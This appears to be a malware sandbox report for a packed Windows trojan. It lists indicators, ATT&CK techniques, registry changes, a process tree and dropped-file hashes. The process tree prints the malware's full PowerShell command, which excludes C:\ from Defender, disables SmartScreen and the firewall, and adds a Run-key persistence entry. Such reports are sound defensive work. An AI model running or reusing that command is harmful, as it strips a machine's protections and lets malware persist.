8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154

General

Target

8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
Size

3.8MB
MD5

debb7adbe78865c8950deb98364378f6
SHA1

f705f91f018d64d135193115044f8e838c34f869
SHA256

8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154
SHA512

719427e6b19f63f9d1175c7a3765cc4c9aa61af041f2f4699b2498ec6fb540928a903bf2f6c1dd88fa3ad420e5823d52212c3d5374d15a4dea4f04dbb34bdfde

Score

10^/10

evasion persistence themida trojan

Malware Config

Signatures

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

powershell.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4" powershell.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

UpSys.exeUpSys.exeUpSys.exe

pid process

1192 UpSys.exe
432 UpSys.exe
1056 UpSys.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

976 netsh.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4"	powershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe

pid	process
1192	UpSys.exe
432	UpSys.exe
1056	UpSys.exe

pid	process
976	netsh.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe

Drops startup file 1 IoCs

Processes:

8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe

Loads dropped DLL 2 IoCs

Processes:

8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exepowershell.exe

pid process

1648 8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1772 powershell.exe

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/memory/1648-54-0x000000013F630000-0x000000013FFA2000-memory.dmp	themida
behavioral1/memory/1648-55-0x000000013F630000-0x000000013FFA2000-memory.dmp	themida
\ProgramData\MicrosoftNetwork\System.exe	themida
behavioral1/memory/1648-85-0x000000013F630000-0x000000013FFA2000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinNet = "C:\\ProgramData\\MicrosoftNetwork\\System.exe"	powershell.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe

pid process

1648 8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
Drops file in Windows directory 1 IoCs

Processes:

makecab.exe

description ioc process

File created C:\Windows\Logs\CBS\CbsPersist_20220812001606.cab makecab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\Logs\CBS\CbsPersist_20220812001606.cab	makecab.exe

Modifies data under HKEY_USERS 5 IoCs

Processes:

powershell.exeUpSys.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 30cf76b7e0add801	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	UpSys.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	UpSys.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	UpSys.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exepowershell.exeUpSys.exeUpSys.exepowershell.exe

pid	process
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1772	powershell.exe
1192	UpSys.exe
1192	UpSys.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
432	UpSys.exe
432	UpSys.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1620	powershell.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exeUpSys.exeUpSys.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1772	powershell.exe
Token: SeDebugPrivilege	1192	UpSys.exe
Token: SeAssignPrimaryTokenPrivilege	1192	UpSys.exe
Token: SeIncreaseQuotaPrivilege	1192	UpSys.exe
Token: 0	1192	UpSys.exe
Token: SeDebugPrivilege	432	UpSys.exe
Token: SeAssignPrimaryTokenPrivilege	432	UpSys.exe
Token: SeIncreaseQuotaPrivilege	432	UpSys.exe
Token: SeDebugPrivilege	1620	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exepowershell.exeUpSys.exe

description	pid	process	target process
PID 1648 wrote to memory of 1772	1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe	powershell.exe
PID 1648 wrote to memory of 1772	1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe	powershell.exe
PID 1648 wrote to memory of 1772	1648	8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe	powershell.exe
PID 1772 wrote to memory of 1192	1772	powershell.exe	UpSys.exe
PID 1772 wrote to memory of 1192	1772	powershell.exe	UpSys.exe
PID 1772 wrote to memory of 1192	1772	powershell.exe	UpSys.exe
PID 1772 wrote to memory of 976	1772	powershell.exe	netsh.exe
PID 1772 wrote to memory of 976	1772	powershell.exe	netsh.exe
PID 1772 wrote to memory of 976	1772	powershell.exe	netsh.exe
PID 1056 wrote to memory of 1620	1056	UpSys.exe	powershell.exe
PID 1056 wrote to memory of 1620	1056	UpSys.exe	powershell.exe
PID 1056 wrote to memory of 1620	1056	UpSys.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe
"C:\Users\Admin\AppData\Local\Temp\8c8a3e642b00f27e639ba7feb83a33e11e66ea5f4ecee08f589cc7774c7db154.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Drops startup file
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1648

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
2⤵
- Modifies security service
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1772

C:\ProgramData\UpSys.exe
"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1192

C:\ProgramData\UpSys.exe
"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:432

C:\ProgramData\UpSys.exe
"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
6⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
3⤵
- Modifies Windows Firewall
PID:976

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220812001606.log C:\Windows\Logs\CBS\CbsPersist_20220812001606.cab
1⤵
- Drops file in Windows directory
PID:816

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

2

T1031

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Virtualization/Sandbox Evasion

Web Service

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Virtualization/Sandbox Evasion

1

T1497

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\UpSys.exe

Filesize
923KB

MD5
efe5769e37ba37cf4607cb9918639932

SHA1
f24ca204af2237a714e8b41d54043da7bbe5393b

SHA256
5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

SHA512
33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

Download Submit
C:\ProgramData\UpSys.exe

Filesize
923KB

MD5
efe5769e37ba37cf4607cb9918639932

SHA1
f24ca204af2237a714e8b41d54043da7bbe5393b

SHA256
5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

SHA512
